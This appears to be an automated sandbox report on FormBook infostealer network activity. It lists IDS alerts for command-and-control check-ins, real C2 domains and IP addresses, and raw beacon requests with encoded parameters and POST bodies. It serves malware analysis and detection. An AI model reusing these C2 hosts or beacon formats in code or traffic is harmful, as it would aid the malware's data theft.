Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50017 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49985 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50009 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50013 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50010 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 66.33.60.67:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49977 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 66.33.60.67:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50022 -> 213.176.96.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50020 -> 162.210.199.73:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50021 -> 162.210.199.73:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49993 -> 66.33.60.67:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50004 -> 217.160.0.240:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50008 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50001 -> 160.238.85.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49989 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50018 -> 162.210.199.73:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 217.160.0.240:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50012 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50016 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 217.160.0.240:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49997 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50005 -> 217.160.0.240:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50011 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50025 -> 213.176.96.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 160.238.85.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50024 -> 213.176.96.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 160.238.85.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50026 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50027 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50015 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50023 -> 213.176.96.198:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 160.238.85.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50014 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50028 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50019 -> 162.210.199.73:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 66.33.60.67:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.l63339.xyz
Source:	DNS query: www.seasay.xyz
Source:	DNS query: www.autonomousrich.xyz
Source:	DNS query: www.nmw365.xyz

Source: Joe Sandbox View	IP Address: 103.106.67.112 103.106.67.112
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /vhr7/?3Je=YbIT&jLKPrvv=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0DPw8ZLv8n+jVvEkjzRDyf1FFJKGTm/x08ZOhgwkEPf0hvFuhdZt1S6 HTTP/1.1Host: www.l63339.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /c9ts/?jLKPrvv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7Qzpj06nGEzNEnovnPrsEb7KL1brrzNpzul2VEXvMTZ1g4GQAuWECb3v8&3Je=YbIT HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /k566/?3Je=YbIT&jLKPrvv=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MdLjldftk+pS4j839nhzGVAWPSO5aQYaeXSj4P+pnuEIGWZVsh7JvfN HTTP/1.1Host: www.tumbetgirislinki.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /jgkl/?jLKPrvv=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+IqhGLYCnqltFYDkW9rwSVxH+ZM2/XnYhAogS2Zyd/o6zK+cbwINARG&3Je=YbIT HTTP/1.1Host: www.lucynoel6465.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /e0jv/?jLKPrvv=T5a+nPXa7vHYgORYo4/nz9dQiuUIDqRyja1Bw4L97U3J4ftOxLqNqCnP0drWj2p7z+i5x9/xm7UTGnu+MMyQhOsx+uzIcWWFswczbpvbbSQGGU4ijnRmFI/iSrohGZkBVJ02P2fo5ikl&3Je=YbIT HTTP/1.1Host: www.kjuw.partyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /goj6/?jLKPrvv=90Ns8gSHVfuKmwMskYN175qt0l+UYxk4CHvhiyRIaCFX9JzO3hXkP8KhIgrW4So8W45OggNWRvJOekdu518DaUGFYZXR3z02vfmR3I3w4s/Ij1npIVCelEqXEJVOfL6H94xHE9RXLphk&3Je=YbIT HTTP/1.1Host: www.topitch.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /djyl/?jLKPrvv=x4UYXwVOLjDEdQDRDI++Xtp6PNmrq7huXBbMFKiZ0gPoO4cAuWUld7aOUpT7mf2hDxK0oNwUa8NOb38b0vRz8W7xEr5q9i1+FtnFOkXOjRvyYuCvjuSwX62ELWAg5qJlUg38lwe6F78M&3Je=YbIT HTTP/1.1Host: www.partflix.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /qejj/?jLKPrvv=PpgyVvjpBOBybA0RbpuAm+uTuPWX1fDQ7x0KObR0TUF97L5S0+m/tmQdUijwUCZ7QEWVmW2RSQCCxQKcArG0insqTTsC+3ZRA/aJ2L8M8sYoHwl1n6oF+kMFN/XSrm1L/ejEE584fGKP&3Je=YbIT HTTP/1.1Host: www.autonomousrich.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /baqk/?jLKPrvv=uI1AML1lKsYfKpBjOYYBTsW2eceMYAINrtsxZHex5MMBBnuaf6/bImWsfHxWa/VaEP1krQYtY2JPJ2rDPpQjXb/1t9o3oBCV/hwDbWSGcgceG0DIqaiwMJhtI/GZr2tc+jDdjdgzJXC1&3Je=YbIT HTTP/1.1Host: www.jyc11.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /p3wh/?jLKPrvv=Hd2sFJVZ8LcLc2zq8SS/jY43YG5m/Gon+jiZ/fyxngK/n/iKSxNvyY3CXM04E4ES47mi5u1FYqRlLPE2yslLzG24xnyQh+iOi0SBXbELiFGcRCcmRe4JRHntEkBqqUEZzkIQdJnu5IEF&3Je=YbIT HTTP/1.1Host: www.solucionesclinicas.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /d3qr/?3Je=YbIT&jLKPrvv=adxeJJsQURDbBvCDbk0BQj+uIV6cESBqPre5BCvLy1d87p28QgcEqVbbk5ik4N9jwb72Egzt44/T7B+6DD1KPq0l9c4lYUhz35uurmsr5c8QUnhs25UDwGQQKqIfAEm+Gb+gKvIF3mUH HTTP/1.1Host: www.nmw365.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /oigm/?jLKPrvv=fuBWCKRrr8969+VzHs9AcPXZRXUa1JiFDVq8egneuNI/nSVjEBFKaLkRuSerrPtgdavOqtuPr6fGsE/TlJUMP0rU1ObIISYKpFBFrSbkPc7NHxCLMpQTKjTGiJ/A4whZLpAiilgayLFl&3Je=YbIT HTTP/1.1Host: www.epdemexi.latAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /5m6k/?jLKPrvv=CFDajtldEjmLCpsutpw37x98DYFAYxNMDhQ3gxI8ryo2/SDJw6ppQfSlCfaEfAhookiKYLSVtVynP1r/lBay82wqoXBq9z5kNRKzAT93HOBGIZZFzxN/dYs5B/ZMvVHkMa7Mwl31dTrB&3Je=YbIT HTTP/1.1Host: www.sscexampyq.watchesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /xvk7/?jLKPrvv=D2H6cq8Q3DqiMWUz+FL3wQH40ji/h/G6FkzDQm1Pm2pV5QPYVMTgQxtmL2CGdLit/09zCaV5brcnjhHMK3Gueaf12Ye+Amp96oHs3fpUhIM3fzUce1anmYo//XoVbQduiVtmIFHvIsto&3Je=YbIT HTTP/1.1Host: www.besttreasurespot.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

Source: global traffic	DNS traffic detected: DNS query: www.l63339.xyz
Source: global traffic	DNS traffic detected: DNS query: www.seasay.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tumbetgirislinki.fit
Source: global traffic	DNS traffic detected: DNS query: www.lucynoel6465.shop
Source: global traffic	DNS traffic detected: DNS query: www.kjuw.party
Source: global traffic	DNS traffic detected: DNS query: www.topitch.top
Source: global traffic	DNS traffic detected: DNS query: www.partflix.net
Source: global traffic	DNS traffic detected: DNS query: www.autonomousrich.xyz
Source: global traffic	DNS traffic detected: DNS query: www.jyc11.top
Source: global traffic	DNS traffic detected: DNS query: www.solucionesclinicas.net
Source: global traffic	DNS traffic detected: DNS query: www.nmw365.xyz
Source: global traffic	DNS traffic detected: DNS query: www.epdemexi.lat
Source: global traffic	DNS traffic detected: DNS query: www.sscexampyq.watches
Source: global traffic	DNS traffic detected: DNS query: www.besttreasurespot.shop
Source: global traffic	DNS traffic detected: DNS query: www.szty13.vip
Source: global traffic	DNS traffic detected: DNS query: www.velquest.live

Source: unknown

HTTP traffic detected: POST /c9ts/ HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.seasay.xyzReferer: http://www.seasay.xyz/c9ts/Content-Length: 220Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5Data Raw: 6a 4c 4b 50 72 76 76 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 46 36 57 58 32 78 58 4d 50 49 78 69 4a 75 36 49 52 48 59 6e 55 4c 6b 7a 41 74 66 75 65 4b 75 72 51 35 70 50 52 74 73 32 58 79 46 63 6c 75 6f 49 52 59 54 59 4b 44 4b 54 43 74 31 59 32 2f 49 30 47 63 49 70 45 34 70 57 54 45 55 36 4b 7a 67 50 58 5a 69 6f 64 6d 78 4c 71 6f 66 58 49 2b 4c 37 36 62 4b 35 66 52 48 31 69 32 65 45 32 57 75 44 59 42 30 36 32 51 56 2f 32 4d 73 62 32 48 6b 75 32 32 5a 47 36 32 51 35 4f 2b 50 30 55 43 61 74 4b 43 4f 31 50 65 31 62 32 68 5a 31 77 32 2f 37 5a 41 2f 31 69 55 4a 65 31 6c 63 56 34 50 67 66 68 49 71 4e 47 72 71 31 48 69 72 77 33 5a 38 4d 66 31 69 75 77 3d 3d Data Ascii: jLKPrvv=W0JY4Dlg8zmW5F6WX2xXMPIxiJu6IRHYnULkzAtfueKurQ5pPRts2XyFcluoIRYTYKDKTCt1Y2/I0GcIpE4pWTEU6KzgPXZiodmxLqofXI+L76bK5fRH1i2eE2WuDYB062QV/2Msb2Hku22ZG62Q5O+P0UCatKCO1Pe1b2hZ1w2/7ZA/1iUJe1lcV4PgfhIqNGrq1Hirw3Z8Mf1iuw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:41:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hoXIRiWNng8bG2tUxXOTok6zARcUreektK4736ENeQjHIHkucbjRqzbjgh4FYC4YKrIODIKBEXzfdqksCyxjNpXZoNP6dCmiR%2BpirOZZBuo2nU3qiINkSz4GSJqUJwuqGzbYL6%2BGvqT1I1U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fcecd4a241f4c-DENalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=45286&min_rtt=45286&rtt_var=22643&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=564&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 35 66 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 Data Ascii: 2a5f<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:41:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fKtG87Dl8vCVymNjQ3Bugum40n36x6DZPpzS%2B18F31u9uwfBUuypByC9KWnDuEo2G71XeUC4QdBvozWhgozLHe2VHoyihxNyDJZ6GHQsY5rk5A3NKm5b3vThFBUz2lCQOOqla4sqIVQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fcf093db9e80b-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=37322&min_rtt=37322&rtt_var=18661&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=854&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:41:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLy%2BeDp5FR1z35%2BBbFJM0Mi9YU635fdKM26GCvAEo9dWiH1FDhjSSSwsvJhrXs7XG33mLwy2HUBXxpPbkjv8R04fyppx38XFrTJEPZUpNlh%2FdlKRYdwEn9GhRckerddaFZQENrTKNec%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fcf18ec0c629f-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=20350&min_rtt=20350&rtt_var=10175&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1867&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 